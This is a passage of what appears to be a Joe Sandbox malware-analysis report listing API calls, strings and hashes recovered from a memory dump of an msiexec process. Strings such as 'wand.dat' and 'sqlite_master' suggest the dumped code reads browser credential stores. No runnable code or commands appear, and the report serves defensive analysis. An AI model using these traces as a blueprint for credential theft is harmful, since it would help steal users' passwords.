                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memcpymemset
                                                                            • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                                            • API String ID: 1297977491-2063813899
                                                                            • Opcode ID: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                            • Instruction ID: f910cd7a27c7e389b2617bf4251edf561ae6288f62f29054cc1fb9bea0934792
                                                                            • Opcode Fuzzy Hash: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                            • Instruction Fuzzy Hash: 1E418E75A00615EFCB04DF5AD881A99BBF0FF48314F65816BE808DB352D778E950CB88
                                                                            APIs
                                                                            • memset.MSVCRT ref: 0040560C
                                                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                              • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                              • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                              • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                              • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                              • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                              • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                              • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                              • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                              • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                              • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                              • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                            • String ID: *.*$dat$wand.dat
                                                                            • API String ID: 2618321458-1828844352
                                                                            • Opcode ID: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                            • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                                                            • Opcode Fuzzy Hash: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                            • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                                                            APIs
                                                                              • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040ECF9
                                                                              • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
                                                                            • wcslen.MSVCRT ref: 00410C74
                                                                            • _wtoi.MSVCRT(?), ref: 00410C80
                                                                            • _wcsicmp.MSVCRT ref: 00410CCE
                                                                            • _wcsicmp.MSVCRT ref: 00410CDF
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                                                            • String ID:
                                                                            • API String ID: 1549203181-0
                                                                            • Opcode ID: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                                                                            • Instruction ID: d767fa7272777d82bc727b9b5621bf7cb5fcf48a3d465f11467ce1d5a1151d11
                                                                            • Opcode Fuzzy Hash: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                                                                            • Instruction Fuzzy Hash: 5E4190359006089FCF21DFA9D480AD9BBB4EF48318F1105AAEC05DB316D6B4EAC08B99
                                                                            APIs
                                                                            • memset.MSVCRT ref: 00412057
                                                                              • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                                                                            • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                                            • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                                            • GetKeyState.USER32(00000010), ref: 0041210D
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                                            • String ID:
                                                                            • API String ID: 3550944819-0
                                                                            • Opcode ID: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                            • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                                                            • Opcode Fuzzy Hash: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                            • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                                                            APIs
                                                                            • free.MSVCRT ref: 0040F561
                                                                            • memcpy.MSVCRT(00000000,?,00000001,g4@,00000000,0000121C,?,?,?,00403467), ref: 0040F573
                                                                            • memcpy.MSVCRT(00000000,?,?,00000000), ref: 0040F5A6
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memcpy$free
                                                                            • String ID: g4@
                                                                            • API String ID: 2888793982-2133833424
                                                                            • Opcode ID: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                                                            • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                                                            • Opcode Fuzzy Hash: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                                                            • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                                                            APIs
                                                                            • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129CF
                                                                            • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129F9
                                                                            • memcpy.MSVCRT(?,?,00000013,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 00412A1D
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memcpy
                                                                            • String ID: @
                                                                            • API String ID: 3510742995-2766056989
                                                                            • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                            • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                                                                            • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                            • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                                                                            APIs
                                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF07
                                                                            • memset.MSVCRT ref: 0040AF18
                                                                            • memcpy.MSVCRT(0045A474,?,?,00000000,00000000,?,00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF24
                                                                            • ??3@YAXPAX@Z.MSVCRT ref: 0040AF31
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: ??2@??3@memcpymemset
                                                                            • String ID:
                                                                            • API String ID: 1865533344-0
                                                                            • Opcode ID: 82436da6c66710f23280fd31fc8fdf524fb88115ade507c785a214d55f13102a
                                                                            • Instruction ID: b60eca7fe842e91d7951f76ed0837c2ba419520120b0ca9395dcc9976308fc09
                                                                            • Opcode Fuzzy Hash: 82436da6c66710f23280fd31fc8fdf524fb88115ade507c785a214d55f13102a
                                                                            • Instruction Fuzzy Hash: C7118C71204701AFD328DF2DC881A27F7E9EF99300B21892EE49AC7385DA35E811CB55
                                                                            APIs
                                                                            • memset.MSVCRT ref: 004144E7
                                                                              • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                                              • Part of subcall function 0040A353: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                            • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                                            • memset.MSVCRT ref: 0041451A
                                                                            • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                            • String ID:
                                                                            • API String ID: 1127616056-0
                                                                            • Opcode ID: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                            • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                                                            • Opcode Fuzzy Hash: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                            • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                                                            APIs
                                                                            • memcpy.MSVCRT(?,?,00000068,sqlite_master), ref: 0042FEC6
                                                                            • memset.MSVCRT ref: 0042FED3
                                                                            • memcpy.MSVCRT(?,?,00000068,?,?,?,00000000,?,?,?,?,?,?,?,sqlite_master), ref: 0042FF04
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memcpy$memset
                                                                            • String ID: sqlite_master
                                                                            • API String ID: 438689982-3163232059
                                                                            • Opcode ID: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                                                                            • Instruction ID: 9056235088afc86d32383ab843763c359d37acea7f1aa245e41bfa901f9896ac
                                                                            • Opcode Fuzzy Hash: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                                                                            • Instruction Fuzzy Hash: 9401C872D006047BDB11AFB19C42FDEBB7CEF05318F51452BFA0461182E73A97248795
                                                                            APIs
                                                                            • SHGetMalloc.SHELL32(?), ref: 00414D9A
                                                                            • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                                                                            • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                                                                            • wcscpy.MSVCRT ref: 00414DF3
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: BrowseFolderFromListMallocPathwcscpy
                                                                            • String ID:
                                                                            • API String ID: 3917621476-0
                                                                            • Opcode ID: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                                                                            • Instruction ID: 3f0f02420fde520a26c7535fd1ed00e0b1d7e8cc8ebd586967f5863715f62e8c
                                                                            • Opcode Fuzzy Hash: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                                                                            • Instruction Fuzzy Hash: 3311FAB5A00208AFDB10DFA9D9889EEB7F8FB49314F10446AF905E7200D739DB45CB64
                                                                            APIs
                                                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                              • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                              • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                            • _snwprintf.MSVCRT ref: 00410FE1
                                                                            • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                                                                              • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                              • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                            • _snwprintf.MSVCRT ref: 0041100C
                                                                            • wcscat.MSVCRT ref: 0041101F
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                                                            • String ID:
                                                                            • API String ID: 822687973-0
                                                                            • Opcode ID: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                                                                            • Instruction ID: a8ddfa12325215ca31dcaa8c3ea10779747deab4b932dc2622e692dd88e5739d
                                                                            • Opcode Fuzzy Hash: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                                                                            • Instruction Fuzzy Hash: DC0184B59003056AF730E765DC86FAB73ACAB44708F04047AB319F6183DA79A9454A6D
                                                                            APIs
                                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7591DF80,?,0041755F,?), ref: 00417452
                                                                            • malloc.MSVCRT ref: 00417459
                                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,7591DF80,?,0041755F,?), ref: 00417478
                                                                            • free.MSVCRT ref: 0041747F
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharMultiWide$freemalloc
                                                                            • String ID:
                                                                            • API String ID: 2605342592-0
                                                                            • Opcode ID: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                                            • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                                                            • Opcode Fuzzy Hash: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                                            • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                                                                            • RegisterClassW.USER32(?), ref: 00412428
                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                                            • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: HandleModule$ClassCreateRegisterWindow
                                                                            • String ID:
                                                                            • API String ID: 2678498856-0
                                                                            APIs
                                                                            • GetDlgItem.USER32(?,?), ref: 00409B40
                                                                            • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                                                                            • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                                                                            • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Item
                                                                            • String ID:
                                                                            • API String ID: 3888421826-0
                                                                            APIs
                                                                            • memset.MSVCRT ref: 00417B7B
                                                                            • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                                                                            • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                                                                            • GetLastError.KERNEL32 ref: 00417BB5
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: File$ErrorLastLockUnlockmemset
                                                                            • String ID:
                                                                            • API String ID: 3727323765-0
                                                                            APIs
                                                                            • memset.MSVCRT ref: 0040F673
                                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                                                                            • strlen.MSVCRT ref: 0040F6A2
                                                                            • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                            • String ID:
                                                                            • API String ID: 2754987064-0
                                                                            APIs
                                                                            • memset.MSVCRT ref: 0040F6E2
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
                                                                            • strlen.MSVCRT ref: 0040F70D
                                                                            • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                            • String ID:
                                                                            • API String ID: 2754987064-0
                                                                            APIs
                                                                            • memset.MSVCRT ref: 00402FD7
                                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
                                                                            • strlen.MSVCRT ref: 00403006
                                                                            • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                            • String ID:
                                                                            • API String ID: 2754987064-0
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: wcscpy$CloseHandle
                                                                            • String ID: General
                                                                            • API String ID: 3722638380-26480598
                                                                            APIs
                                                                              • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                                              • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                                              • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                                            • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                                            • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                                            • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                                            • GetStockObject.GDI32(00000000), ref: 004143C6
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                                            • String ID:
                                                                            • API String ID: 764393265-0
                                                                            APIs
                                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                                            • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                                            • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: Time$System$File$LocalSpecific
                                                                            • String ID:
                                                                            • API String ID: 979780441-0
                                                                            APIs
                                                                            • memcpy.MSVCRT(0045A808,?,00000050,?,0040155D,?), ref: 004134E0
                                                                            • memcpy.MSVCRT(0045A538,?,000002CC,0045A808,?,00000050,?,0040155D,?), ref: 004134F2
                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                                            • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memcpy$DialogHandleModuleParam
                                                                            • String ID:
                                                                            • API String ID: 1386444988-0
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: ??3@
                                                                            • String ID:
                                                                            • API String ID: 613200358-0
                                                                            APIs
                                                                            • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                                                                            • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: InvalidateMessageRectSend
                                                                            • String ID: d=E
                                                                            • API String ID: 909852535-3703654223
                                                                            APIs
                                                                            • wcschr.MSVCRT ref: 0040F79E
                                                                            • wcschr.MSVCRT ref: 0040F7AC
                                                                              • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                                              • Part of subcall function 0040AA8C: memcpy.MSVCRT(00000000,?,00000000,00000000,?,0000002C,?,0040F7F4,?,?,?,?,004032AB,?), ref: 0040AACB
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: wcschr$memcpywcslen
                                                                            • String ID: "
                                                                            • API String ID: 1983396471-123907689
                                                                            APIs
                                                                              • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                            • _memicmp.MSVCRT ref: 0040C00D
                                                                            • memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: FilePointer_memicmpmemcpy
                                                                            • String ID: URL
                                                                            • API String ID: 2108176848-3574463123
                                                                            APIs
                                                                            • _snwprintf.MSVCRT ref: 0040A398
                                                                            • memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: _snwprintfmemcpy
                                                                            • String ID: %2.2X
                                                                            • API String ID: 2789212964-323797159
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: _snwprintf
                                                                            • String ID: %%-%d.%ds
                                                                            • API String ID: 3988819677-2008345750
                                                                            • Opcode ID: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                                            • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                                                                            • Opcode Fuzzy Hash: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                                            • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                                                                            APIs
                                                                            • memset.MSVCRT ref: 0040E770
                                                                            • SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSendmemset
                                                                            • String ID: F^@
                                                                            • API String ID: 568519121-3652327722
                                                                            • Opcode ID: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                            • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                                                            • Opcode Fuzzy Hash: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                            • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: PlacementWindowmemset
